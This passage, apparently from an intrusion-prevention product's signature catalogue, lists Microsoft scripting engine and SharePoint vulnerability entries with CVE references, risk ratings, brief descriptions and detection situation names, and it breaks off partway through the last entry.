There exists a memory corruption vulnerability in the scripting engine of Microsoft Edge. A remote attacker can use this to execute arbitrary code in the context of the current user.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0840

References:

CVE-2018-0840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0840

ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0858

About this vulnerability:

A vulnerability in ChakraCore

Risk:

High

First detected in:

sgpkg-ips-1043-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

ChakraCore

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in the ChakraCore scripting engine. A remote attacker can use this to execute arbitrary code in the context of the current user.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0858

References:

CVE-2018-0858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0858

ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0860

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1043-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in the scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code in the context of the current user.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0860

References:

CVE-2018-0860
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0860

ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8229

About this vulnerability:

A vulnerability in Chakra Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Chakra Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8229

References:

CVE-2018-8229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8229

ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8266

About this vulnerability:

A vulnerability in Chakra Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1092-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Chakra Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8266

References:

CVE-2018-8266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8266

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8353

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1092-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the scripting engine in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8353

References:

CVE-2018-8353
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8353

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8355

About this vulnerability:

A vulnerability in Chakra Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1092-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Chakra Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8355

References:

CVE-2018-8355
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8355

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8371

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1092-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the scripting engine in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8371

References:

CVE-2018-8371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8371

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8372

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1092-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the scripting engine in Microsoft Browsers. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8372

References:

CVE-2018-8372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8372

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8384

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1092-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8384

References:

CVE-2018-8384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8384

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8387

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1092-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8387

References:

CVE-2018-8387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8387

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8389

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1092-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the scripting engine in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8389

References:

CVE-2018-8389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8389

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8403

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1092-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the scripting engine in Microsoft Browsers. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8403

References:

CVE-2018-8403
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8403

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2024-38178

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1763-5242

Last changed:

sgpkg-ips-1763-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A memory corruption vulnerability leading to unauthenticated remote code execution has been reported in Microsoft Windows Scripting Engine.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2024-38178

References:

CVE-2024-38178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38178

ms24-aug
http://technet.microsoft.com/security/bulletin/ms24-aug

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1001

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1175-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Windows

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1001

References:

CVE-2019-1001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1001

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1004

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1175-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Windows

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1004

References:

CVE-2019-1004
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1004

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1062

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1175-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Windows

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1062

References:

CVE-2019-1062
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1062

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1063

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1175-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Windows

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1063

References:

CVE-2019-1063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1063

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1092

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1175-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Windows

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1092

References:

CVE-2019-1092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1092

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1103

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1175-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Windows

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1103

References:

CVE-2019-1103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1103

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1104

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1175-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Windows

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1104

References:

CVE-2019-1104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1104

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1106

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1175-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Windows

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1106

References:

CVE-2019-1106
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1106

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1107

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1175-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Windows

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1107

References:

CVE-2019-1107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1107

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2020-17052

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1295-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0;Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Scripting Engine. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2020-17052

References:

CVE-2020-17052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17052

ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2021-34480

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1376-5242

Last changed:

sgpkg-ips-1376-5242

Platform:

Windows

Software:

Internet Explorer; Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Scripting Engine. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2021-34480

References:

CVE-2021-34480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34480

ms21-aug
http://technet.microsoft.com/security/bulletin/ms21-aug

Microsoft-Scripting-Runtime-Object-Library-Use-After-Free-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-555-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP2; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2; Windows 8; Windows 2012; Windows RT

Software:

<os>

Type:

Malfunction

Description:

A use-after-free vulnerability exists in the Microsoft Scripting Runtime Object Library. The vulnerability is due to an object handling error that leads to memory corruption condition. A remote, unauthenticated attacker can exploit this vulnerability by enticing an unsuspecting user to access a maliciously crafted website. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Microsoft-Scripting-Runtime-Object-Library-Use-After-Free-Vulnerability

References:

CVE-2013-5056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5056

BID-64082
http://www.securityfocus.com/bid/64082

OSVDB-100766
http://www.osvdb.org/100766

MS13-099
http://technet.microsoft.com/security/bulletin/MS13-099

Microsoft-Sharepoint-Accessserviceslisteventreceiver-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft Office SharePoint Server

Risk:

Moderate

First detected in:

sgpkg-ips-1823-5242

Last changed:

sgpkg-ips-1823-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server

Type:

Input Validation

Description:

Improper input validation of the workflow rules file generated based on an Access data macro of an uploaded Access template file causes an insecure deserialization vulnerability in Microsoft Sharepoint. A successful exploitation may result in an attacker being able to execute code on the target system.

Situation:

HTTP_CRL-Microsoft-Sharepoint-Macro-Workflow-Insecure-Deserialization

References:

CVE-2024-43464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43464

Microsoft-Sharepoint-Authentication-Bypass-CVE-2023-29357

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Sharepoint detected

Risk:

High

First detected in:

sgpkg-ips-1600-5242

Last changed:

sgpkg-ips-1600-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

An authentication issue has been identified in Sharepoint. This vulnerability can be exploited to achieve pre-authentication remote code execution.

Situation:

HTTP_CSU-Microsoft-Sharepoint-Authentication-Bypass-CVE-2023-29357
HTTP_CSH-Microsoft-Sharepoint-Authentication-Bypass-CVE-2023-29357

References:

CVE-2023-29357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29357

ms23-jun
http://technet.microsoft.com/security/bulletin/ms23-jun

Microsoft-Sharepoint-Basexmldatasource-XML-External-Entity-Injection

About this vulnerability:

A vulnerability in Microsoft Sharepoint Server

Risk:

High

First detected in:

sgpkg-ips-1751-5242

Last changed:

sgpkg-ips-1751-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

An XML External Entity Injection vulnerability has been reported in Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of XML documents retrieved from provided URLs. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the disclosure of information in the security context of the server process.

Situation:

HTTP_CS-Microsoft-Sharepoint-Basexmldatasource-XML-External-Entity-Injection

References:

CVE-2024-30043
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30043

ms24-may
http://technet.microsoft.com/security/bulletin/ms24-may

Microsoft-Sharepoint-Calendar-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Microsoft Office SharePoint

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in Microsoft SharePoint. The vulnerability is due to insufficient sanitation of the request URL string by the SharePoint server. By enticing a user to open a maliciously crafted URL containing Java Script code, an attacker can cause SharePoint commands to be executed within the security context of the target user. A successful attack could lead to privilege escalation or information disclosure.

Situation:

HTTP_CRL-Microsoft-Sharepoint-Calendar-Cross-Site-Scripting

References:

CVE-2011-0653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0653

BID-49002
http://www.securityfocus.com/bid/49002

OSVDB-75389
http://www.osvdb.org/75389

MS11-074
http://technet.microsoft.com/security/bulletin/MS11-074

Microsoft-Sharepoint-Cross-Site-Scripting-Vulnerability-CVE-2015-1640

About this vulnerability:

A vulnerability in Microsoft Office SharePoint

Risk:

High

First detected in:

sgpkg-ips-638-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Cross-site Scripting

Description:

There is a cross-site scripting (XSS) vulnerability in Microsoft SharePoint.

Situation:

HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2015-1640

References:

CVE-2015-1640
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1640

MS15-036
http://technet.microsoft.com/security/bulletin/MS15-036

Microsoft-SharePoint-CVE-2019-1443-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft SharePoint

Risk:

High

First detected in:

sgpkg-ips-1218-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

There exists a vulnerability in multiple versions of Microsoft Sharepoint which allows remote attackers to disclose NTLM hashes by uploading a maliciously crafted file to the target Sharepoint server, due to insufficient validation of uploaded files.

Situation:

HTTP_CS-Microsoft-SharePoint-CVE-2019-1443-Information-Disclosure

References:

CVE-2019-1443
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1443

Microsoft-Sharepoint-Denial-Of-Service-Vulnerability

About this vulnerability:

A vulnerability in Sharepoint

Risk:

Moderate

First detected in:

sgpkg-ips-542-5211

Last changed:

sgpkg-ips-1636-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Malfunction

Description:

A DoS vulnerability in SharePoint

References:

CVE-2013-0081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0081

MS13-067
http://technet.microsoft.com/security/bulletin/MS13-067

Microsoft-SharePoint-Directory-Traversal-Vulnerability

About this vulnerability:

A vulnerability in Microsoft SharePoint

Risk:

High

First detected in:

sgpkg-ips-515-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server; Microsoft SharePoint Foundation

Type:

Input Validation

Description:

There is a vulnerability in Microsoft SharePoint.

Situation:

HTTP_CSU-Microsoft-SharePoint-Directory-Traversal-Vulnerability

References:

CVE-2013-0084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0084

MS13-024
http://technet.microsoft.com/security/bulletin/MS13-024

Microsoft-Sharepoint-Editform-Script-Injection-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Office SharePoint Server

Risk:

Moderate

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server

Type:

Malfunction

Description:

A vulnerability in Microsoft Office SharePoint Server

Situation:

HTTP_CRL-Microsoft-Sharepoint-Editform-Script-Injection-Vulnerability

References:

CVE-2011-1890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1890

MS11-074
http://technet.microsoft.com/security/bulletin/MS11-074

Microsoft-Sharepoint-Malformed-Request-Code-Execution-CVE-2010-3964

About this vulnerability:

A vulnerability in Microsoft Sharepoint

Risk:

High

First detected in:

sgpkg-ips-363-4219

Last changed:

sgpkg-ips-1589-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Sharepoint.

Situation:

HTTP_CS-Microsoft-Sharepoint-Malformed-Request-Code-Execution-CVE-2010-3964

References:

CVE-2010-3964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3964

BID-45264
http://www.securityfocus.com/bid/45264

OSVDB-69817
http://www.osvdb.org/69817

MS10-104
http://technet.microsoft.com/security/bulletin/MS10-104

Microsoft-SharePoint-Reflected-List-Parameter-CVE-2012-1863

About this vulnerability:

A vulnerability in Microsoft SharePoint

Risk:

High

First detected in:

sgpkg-ips-462-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server 2007; Microsoft SharePoint Services; Microsoft SharePoint Foundation

Type:

Cross-site Scripting

Description:

There is a vulnerability in Microsoft SharePoint.

Situation:

HTTP_CSU-Microsoft-SharePoint-Reflected-List-Parameter-CVE-2012-1863

References:

CVE-2012-1863
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1863

MS12-050
http://technet.microsoft.com/security/bulletin/MS12-050

Microsoft-SharePoint-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft SharePoint

Risk:

High

First detected in:

sgpkg-ips-1151-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

A vulnerability in Microsoft Sharepoint which allows remote attackers to execute remote code due to insufficient sanitization of form parameters.

Situation:

HTTP_CSU-Microsoft-SharePoint-Remote-Code-Execution

References:

CVE-2019-0604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0604

Microsoft-SharePoint-Remote-Code-Execution-CVE-2020-17061

About this vulnerability:

A vulnerability in Microsoft SharePoint Server

Risk:

High

First detected in:

sgpkg-ips-1295-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in Microsoft Sharepoint Server due to insufficient user input validation. A successful exploitation of this vulnerability may allow an authenticated attacker to execute arbitrary .Net code on the server.

Situation:

File-TextId_Microsoft-SharePoint-Remote-Code-Execution-CVE-2020-17061

References:

CVE-2020-17061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17061

ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov

Microsoft-Sharepoint-Remote-Code-Execution-CVE-2025-29793

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Office SharePoint Server detected

Risk:

High

First detected in:

sgpkg-ips-1864-5242

Last changed:

sgpkg-ips-1864-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Microsoft Sharepoint's remote code execution vulnerability CVE-2025-29793.

Situation:

HTTP_CRL-Microsoft-Sharepoint-Macro-Workflow-Insecure-Deserialization

References:

CVE-2025-29793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-29793

ms25-apr
http://technet.microsoft.com/security/bulletin/ms25-apr

Microsoft-Sharepoint-Remote-Code-Execution-Vulnerability-CVE-2023-33157

About this vulnerability:

A vulnerability in Microsoft Sharepoint

Risk:

High

First detected in:

sgpkg-ips-1609-5242

Last changed:

sgpkg-ips-1609-5242

Platform:

Generic

Software:

Microsoft Sharepoint

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Microsoft Sharepoint.

Situation:

File-TextId_Microsoft-Sharepoint-Remote-Code-Execution-Vulnerability-CVE-2023-33157

References:

CVE-2023-33157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33157

ms23-jul
http://technet.microsoft.com/security/bulletin/ms23-jul

Microsoft-Sharepoint-Remote-File-Disclosure-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Office SharePoint Server

Risk:

Moderate

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Malfunction

Description:

A vulnerability in Microsoft SharePoint

Situation:

HTTP_SS-Microsoft-Sharepoint-Remote-File-Disclosure-Vulnerability
File-Text_Microsoft-Sharepoint-Remote-File-Disclosure-Vulnerability

References:

CVE-2011-1892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1892

MS11-074
http://technet.microsoft.com/security/bulletin/MS11-074

Microsoft-Sharepoint-Server-Access-Control-Vulnerability

About this vulnerability:

Vulnerability in Microsoft SharePoint Server's access control

Risk:

Moderate

First detected in:

sgpkg-ips-192-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server

Type:

Malfunction

Description:

Microsoft SharePoint server suffers from an access control vulnerability that allows remote attackers to cause a denial of service, obtain sensitive information and create scripts that run on the vulnerable site.

Situation:

HTTP_CRL-Sharepoint-Server-Access-Control-Exploit

References:

CVE-2008-4032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4032

MS08-077
http://technet.microsoft.com/security/bulletin/MS08-077

Microsoft-Sharepoint-Server-Business-Data-Connectivity-Unsafe-Reflection

About this vulnerability:

A vulnerability in Microsoft Sharepoint Server

Risk:

High

First detected in:

sgpkg-ips-1728-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

An unsafe reflection vulnerability has been reported in the Business Data Connectivity service of Microsoft SharePoint Server. This vulnerability is due to insufficient input validation of the parameters sent to the Create method of an Entity object of a Line-of-Business (LOB) system instance. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of code in the security context of the server process.

Situation:

HTTP_CS-Microsoft-Sharepoint-Server-Business-Data-Connectivity-Unsafe-Reflection

References:

CVE-2024-21318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21318

ms24-jan
http://technet.microsoft.com/security/bulletin/ms24-jan

Microsoft-SharePoint-Server-ChartWebPartDataStorage-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft SharePoint Server.

Risk:

High

First detected in:

sgpkg-ips-1520-5242

Last changed:

sgpkg-ips-1520-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

A vulnerability in Microsoft Sharepoint Server, multiple versions, which allows remote attacker to execute arbitrary code by sending crafted traffic to the target system, due to insufficient validation of data linked to a Chart Web Part.

Situation:

HTTP_CS-Microsoft-SharePoint-Server-ChartWebPartDataStorage-Insecure-Deserialization

References:

CVE-2022-30157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30157

Microsoft-SharePoint-Server-ExecuteBdcMethod-Unsafe-Reflection-CVE-2024-38227

About this vulnerability:

A vulnerability in Microsoft Sharepoint Server

Risk:

High

First detected in:

sgpkg-ips-1846-5242

Last changed:

sgpkg-ips-1846-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

